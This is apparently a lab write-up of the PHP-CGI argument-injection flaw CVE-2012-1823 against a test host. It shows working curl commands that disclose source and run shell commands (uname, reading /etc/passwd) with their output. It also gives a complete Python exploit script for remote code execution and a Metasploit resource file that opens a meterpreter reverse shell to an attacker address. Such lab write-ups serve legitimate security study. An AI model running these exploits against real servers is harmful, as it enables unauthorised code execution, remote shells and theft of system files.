References:
https://pentesterlab.com/exercises/cve-2012-1823/course
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
user@debian:~$ php-cgi -h
Usage: php [-q] [-h] [-s] [-v] [-i] [-f <file>]
       php <file> [args...]
  -a               Run interactively
  -b <address:port>|<port> Bind Path for external FASTCGI Server mode
  -C               Do not chdir to the script's directory
  -c <path>|<file> Look for php.ini file in this directory
  -n               No php.ini file will be used
  -d foo[=bar]     Define INI entry foo with value 'bar'
  -e               Generate extended information for debugger/profiler
  -f <file>        Parse <file>.  Implies `-q'
  -h               This help
  -i               PHP information
  -l               Syntax check only (lint)
  -m               Show compiled in modules
  -q               Quiet-mode.  Suppress HTTP Header output.
  -s               Display colour syntax highlighted source.
  -v               Version number
  -w               Display source with stripped comments and whitespace.
  -z <file>        Load Zend extension <file>.
  -T <count>       Measure execution time of script repeated <count> times.
So we try http://192.168.170.133/index.php?-s
or http://192.168.170.133/?-s
and the (syntax-highlighted) source of index.php is returned. This works because the query string contains no `=`: the CGI specification (RFC 3875) treats such a query as an "indexed" query and passes its `+`-separated words to the CGI program as command-line arguments, so php-cgi receives `-s` exactly as if it had been typed on the command line above. The bug was fixed in PHP 5.3.12/5.4.2, but that first patch could be bypassed (CVE-2012-2311), so 5.3.13/5.4.3 is the effective fix.
Source disclosure is only the start. `-d` sets php.ini entries from the same query string: allow_url_include=1 permits php://input to be included, and auto_prepend_file=php://input makes php-cgi execute the POST body before index.php. The `=` is sent as %3d and spaces as `+` so the query still contains no literal `=`:
➜ ~ curl "http://192.168.170.133/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" --data "<?php system('uname -a');die(); ?>"
Linux debian 2.6.32-5-amd64 #1 SMP Thu Mar 22 17:26:33 UTC 2012 x86_64 GNU/Linux
➜ ~ curl "http://192.168.170.133/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" --data "<?php system('cat /etc/passwd');die(); ?>"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
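The following is an added example, not code from the original post or from the advisory it references. It builds the `-s` and `-d` queries shown above, simulates the CGI "indexed query" rule that hands them to php-cgi as argv (which is why `=` has to be sent as `%3d`), and sends the PHP body with auto_prepend_file=php://input. The target URL, the marker string and the helper names are assumptions for illustration; the argv simulation follows RFC 3875 section 4.4 and is not PHP's or Apache's own code.

```python
"""CVE-2012-1823 request builder and CGI argv simulation (added example).

Assumptions (not from the original page): helper names, the hypothetical
TARGET URL and the marker used to confirm execution.
"""
from typing import Dict, List, Sequence
from urllib.parse import quote, unquote
import urllib.request


def cgi_argv_from_query(query_string: str) -> List[str]:
    """Mimic the RFC 3875 'indexed query' rule as seen by php-cgi.

    A QUERY_STRING containing a literal '=' is a form query and yields no
    arguments.  Otherwise the server splits it on '+' and passes each
    URL-decoded word to the CGI program as argv[1:].
    """
    if "=" in query_string:
        return []
    return [unquote(word) for word in query_string.split("+") if word]


def build_query(ini_settings: Dict[str, str], extra_flags: Sequence[str] = ()) -> str:
    """Encode '-d key=value' pairs so the query has no raw '=' or space.

    '=' is percent-encoded (%3D, equivalent to the %3d used by hand above);
    a raw '=' would turn the request into a form query and php-cgi would
    never see the arguments.
    """
    words: List[str] = []
    for key, value in ini_settings.items():
        words.append("-d")
        words.append(quote(f"{key}={value}", safe=":/"))
    words.extend(extra_flags)
    query = "+".join(words)
    assert "=" not in query and " " not in query, "query would not reach argv"
    return query


# Query for source disclosure (php-cgi -s) and for code execution.
SOURCE_QUERY = build_query({}, ["-s"])
RCE_QUERY = build_query({"allow_url_include": "1",
                         "auto_prepend_file": "php://input"})


def send_php(url: str, php_code: str, timeout: float = 10) -> str:
    """POST php_code to url?RCE_QUERY.

    With auto_prepend_file=php://input, php-cgi runs the request body before
    the requested script, so the response contains the body's output.
    """
    req = urllib.request.Request(
        url + "?" + RCE_QUERY,
        data=php_code.encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def executed(body: str, marker: str) -> bool:
    """True if the marker echoed by the PHP body appears in the response."""
    return marker in body


if __name__ == "__main__":
    TARGET = "http://192.168.170.133/"  # hypothetical lab host, as in the post
    MARKER = "cve-2012-1823-ok"
    # die() stops index.php from running after the injected code.
    probe = f"<?php echo '{MARKER}'; die(); ?>"
    print("argv seen by php-cgi:", cgi_argv_from_query(RCE_QUERY))
    body = send_php(TARGET, probe)
    print("vulnerable" if executed(body, MARKER) else "not vulnerable")
```

Checking the argv simulation first is useful when a request "does nothing": a query such as `-d+allow_url_include=1` with a raw `=` is silently treated as a form query and reaches php-cgi with no arguments at all.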
Using Metasploit (module exploit/multi/http/php_cgi_arg_injection, driven from a resource file):
# php-cgi.msf
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.170.133
set RPORT 80
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.170.132
exploit